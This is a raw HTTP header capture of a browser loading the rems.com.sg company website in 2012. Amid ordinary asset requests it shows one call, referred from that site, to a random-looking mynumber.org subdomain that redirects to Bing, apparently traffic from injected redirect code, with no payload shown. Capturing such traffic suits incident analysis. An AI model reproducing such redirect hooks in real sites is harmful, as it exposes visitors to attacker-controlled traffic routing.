Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/css/screen.css
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 13:14:50 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:32 GMT
Etag: &quot;3dfa2f3-eb-4c52abb8f97c1&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 179
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /css/cmxformTemplate.css HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/css/screen.css
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 13:14:50 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:32 GMT
Etag: &quot;3dfa2ed-3a6-4c52abb8cd0b7&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 377
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /images/applepc.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:50 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:22 GMT
Etag: &quot;11516d4-e7d1-4c52ab75f0854&quot;
Accept-Ranges: bytes
Content-Length: 59345
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /css/cmxform.css HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/css/screen.css
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 13:14:50 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:32 GMT
Etag: &quot;3dfa2ec-3b0-4c52abb89e2b3&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 430
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /ga.js HTTP/1.1

Host: www.google-analytics.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
If-Modified-Since: Wed, 19 Sep 2012 11:51:40 GMT
HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Length: 14888
Content-Encoding: gzip
Last-Modified: Mon, 22 Oct 2012 15:51:19 GMT
X-Content-Type-Options: nosniff, nosniff
Date: Thu, 08 Nov 2012 08:35:01 GMT
Expires: Thu, 08 Nov 2012 20:35:01 GMT
Vary: Accept-Encoding
Age: 16790
Cache-Control: max-age=43200, public
Server: GFE/2.0
GET /images/pc-seo.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:50 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:58 GMT
Etag: &quot;2f38e61-da75-4c52ab987a566&quot;
Accept-Ranges: bytes
Content-Length: 55925
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /images/pc-logo.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:50 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:55 GMT
Etag: &quot;2f38e60-14940-4c52ab955ff57&quot;
Accept-Ranges: bytes
Content-Length: 84288
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /static/fonts/basic/v2/Pqd6s-RedeRT8zQTRwM-ug.woff HTTP/1.1

Host: themes.googleusercontent.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fonts.googleapis.com/css?family=Arimo:400,700|Basic|Aladin
Origin: http://rems.com.sg
HTTP/1.1 200 OK

Content-Type: font/woff
Last-Modified: Mon, 02 Apr 2012 00:13:23 GMT
Date: Thu, 08 Nov 2012 12:46:23 GMT
Expires: Fri, 08 Nov 2013 12:46:23 GMT
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 14024
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 1708
GET /static/fonts/arimo/v3/wZLYhRRxZWGToTRP78bqJQ.woff HTTP/1.1

Host: themes.googleusercontent.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fonts.googleapis.com/css?family=Arimo:400,700|Basic|Aladin
Origin: http://rems.com.sg
HTTP/1.1 200 OK

Content-Type: font/woff
Last-Modified: Mon, 02 Apr 2012 00:13:23 GMT
Date: Wed, 07 Nov 2012 20:35:04 GMT
Expires: Thu, 07 Nov 2013 20:35:04 GMT
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 27056
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 59987
GET /images/Arrow-left-icon.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:51 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:24 GMT
Etag: &quot;11516d6-3e5-4c52ab77f1ad0&quot;
Accept-Ranges: bytes
Content-Length: 997
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /images/Arrow-right-icon.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:51 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:24 GMT
Etag: &quot;11516d7-3f8-4c52ab781fd04&quot;
Accept-Ranges: bytes
Content-Length: 1016
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=652646260&utmhn=rems.com.sg&utmcs=ISO-8859-1&utmsr=1176x885&utmvp=1159x778&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=Rems%20Software%20Solutions%20-%20Complete%20Software%20Solutions%20%7C%20IT%20Services&utmhid=146243232&utmr=-&utmp=%2F&utmac=UA-26846241-6&utmcc=__utma%3D240077056.1854703103.1352380491.1352380491.1352380491.1%3B%2B__utmz%3D240077056.1352380491.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmu=q~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=1&amp;utmn=652646260&amp;utmhn=rems.com.sg&amp;utmcs=ISO-8859-1&amp;utmsr=1176x885&amp;utmvp=1159x778&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=Rems%20Software%20Solutions%20-%20Complete%20Software%20Solutions%20%7C%20IT%20Services&amp;utmhid=146243232&amp;utmr=-&amp;utmp=%2F&amp;utmac=UA-26846241-6&amp;utmcc=__utma%3D240077056.1854703103.1352380491.1352380491.1352380491.1%3B%2B__utmz%3D240077056.1352380491.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&amp;utmu=q~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 07 Nov 2012 20:39:06 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 59745
Server: GFE/2.0
GET /images/pc-ecommerce.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:50 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:53 GMT
Etag: &quot;2f38e5f-11e1e-4c52ab937c983&quot;
Accept-Ranges: bytes
Content-Length: 73246
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /images/requetquot.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:51 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:03 GMT
Etag: &quot;3f09e8c-1bc-4c52ab9cf0cec&quot;
Accept-Ranges: bytes
Content-Length: 444
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /images/webdesign-icon.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:51 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:16 GMT
Etag: &quot;29f0323-e68-4c52aba96122f&quot;
Accept-Ranges: bytes
Content-Length: 3688
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /images/hosting-thmb.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:51 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:41 GMT
Etag: &quot;56516aa-1007-4c52ab88430e0&quot;
Accept-Ranges: bytes
Content-Length: 4103
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /images/e-commerce.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:51 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:32 GMT
Etag: &quot;2d2f723-c5a-4c52ab7fbae98&quot;
Accept-Ranges: bytes
Content-Length: 3162
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
GET /images/seo-thmb.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:51 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:05 GMT
Etag: &quot;b6d6ba-895-4c52ab9ea1a92&quot;
Accept-Ranges: bytes
Content-Length: 2197
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /images/contentmanagement.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:51 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:32 GMT
Etag: &quot;427335a-742-4c52ab7f0dd6b&quot;
Accept-Ranges: bytes
Content-Length: 1858
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
GET /images/logodesign.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:51 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:42 GMT
Etag: &quot;56516af-c3d-4c52ab894ca97&quot;
Accept-Ranges: bytes
Content-Length: 3133
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /in.cgi?14 HTTP/1.1

Host: jmzzhcccwpzcqcpg.mynumber.org

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Thu, 08 Nov 2012 13:14:51 GMT
Content-Length: 150
Connection: keep-alive
Set-Cookie: folqb14=_0_; domain=jmzzhcccwpzcqcpg.mynumber.org; path=/; expires=Sun, 26-Aug-2012 13:24:13 GMT
Location: http://bing.com/
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
GET /images/pc-cms.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:51 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:52 GMT
Etag: &quot;2f38e5e-b511-4c52ab9237ef7&quot;
Accept-Ranges: bytes
Content-Length: 46353
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /images/opensource1.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:51 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:50 GMT
Etag: &quot;2f38e56-3b17-4c52ab902094c&quot;
Accept-Ranges: bytes
Content-Length: 15127
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /images/webdesign1.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:51 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:18 GMT
Etag: &quot;29f0325-2a78-4c52abab8feca&quot;
Accept-Ranges: bytes
Content-Length: 10872
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
GET /images/application-dev.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:52 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:24 GMT
Etag: &quot;11516d5-356a-4c52ab77c346a&quot;
Accept-Ranges: bytes
Content-Length: 13674
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET / HTTP/1.1

Host: bing.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 301 Moved Permanently

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Location: http://www.bing.com/
Edge-control: no-store
P3P: CP=&quot;NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND&quot;
Set-Cookie: _HOP=I=1&amp;TS=1352380492; domain=bing.com; path=/
Date: Thu, 08 Nov 2012 13:14:52 GMT
Content-Length: 0
GET /images/fcebook-ico.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:52 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:35 GMT
Etag: &quot;56516a3-25b-4c52ab827c6a9&quot;
Accept-Ranges: bytes
Content-Length: 603
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
GET / HTTP/1.1

Host: www.bing.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
Cookie: _HOP=I=1&amp;TS=1352380492
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0
P3P: CP=&quot;NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND&quot;
Vary: Accept-Encoding
Content-Encoding: gzip
Date: Thu, 08 Nov 2012 13:14:52 GMT
Content-Length: 12521
Connection: keep-alive
Set-Cookie: _FP=EM=1; expires=Sat, 08-Nov-2014 13:14:52 GMT; domain=.bing.com; path=/ _FS=NU=1; domain=.bing.com; path=/ _HOP=; domain=.bing.com; path=/ _SS=SID=85769599907F41F5B6CE773F1C26F54D; domain=.bing.com; path=/ MUID=0342B58B415E68A91BF9B1994059688F; expires=Sat, 08-Nov-2014 13:14:52 GMT; domain=.bing.com; path=/ OrigMUID=0342B58B415E68A91BF9B1994059688F%2c937ccaa1fdf84836ad798eda1af35d11; expires=Sat, 08-Nov-2014 13:14:52 GMT; domain=.bing.com; path=/ SRCHD=D=2553914&amp;MS=2553914&amp;AF=NOFORM; expires=Sat, 08-Nov-2014 13:14:52 GMT; domain=.bing.com; path=/ SRCHUID=V=2&amp;GUID=56C6A3E957784946BDF6EC2DA3C1708A; expires=Sat, 08-Nov-2014 13:14:52 GMT; path=/ SRCHUSR=AUTOREDIR=0&amp;GEOVAR=&amp;DOB=20121108; expires=Sat, 08-Nov-2014 13:14:52 GMT; domain=.bing.com; path=/
GET /fd/s/a/hpc3.png HTTP/1.1

Host: www.bing.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bing.com/
Cookie: _HOP=; _FP=EM=1; _FS=NU=1; _SS=SID=85769599907F41F5B6CE773F1C26F54D; MUID=0342B58B415E68A91BF9B1994059688F; OrigMUID=0342B58B415E68A91BF9B1994059688F%2c937ccaa1fdf84836ad798eda1af35d11; SRCHD=D=2553914&amp;MS=2553914&amp;AF=NOFORM; SRCHUID=V=2&amp;GUID=56C6A3E957784946BDF6EC2DA3C1708A; SRCHUSR=AUTOREDIR=0&amp;GEOVAR=&amp;DOB=20121108
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Tue, 14 Aug 2012 20:38:35 GMT
Content-Length: 5448
Cache-Control: public, max-age=8776410
Date: Thu, 08 Nov 2012 13:14:52 GMT
Connection: keep-alive
GET /images/twitter-ico.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:52 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:16 GMT
Etag: &quot;29f0322-2a6-4c52aba922e48&quot;
Accept-Ranges: bytes
Content-Length: 678
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /images/linkdn-ico.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:52 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:42 GMT
Etag: &quot;56516ad-2d9-4c52ab88cb8a4&quot;
Accept-Ranges: bytes
Content-Length: 729
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /images/google-plus-ico.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:52 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:39 GMT
Etag: &quot;56516a9-31e-4c52ab8626549&quot;
Accept-Ranges: bytes
Content-Length: 798
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /images/bg-repeat1.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
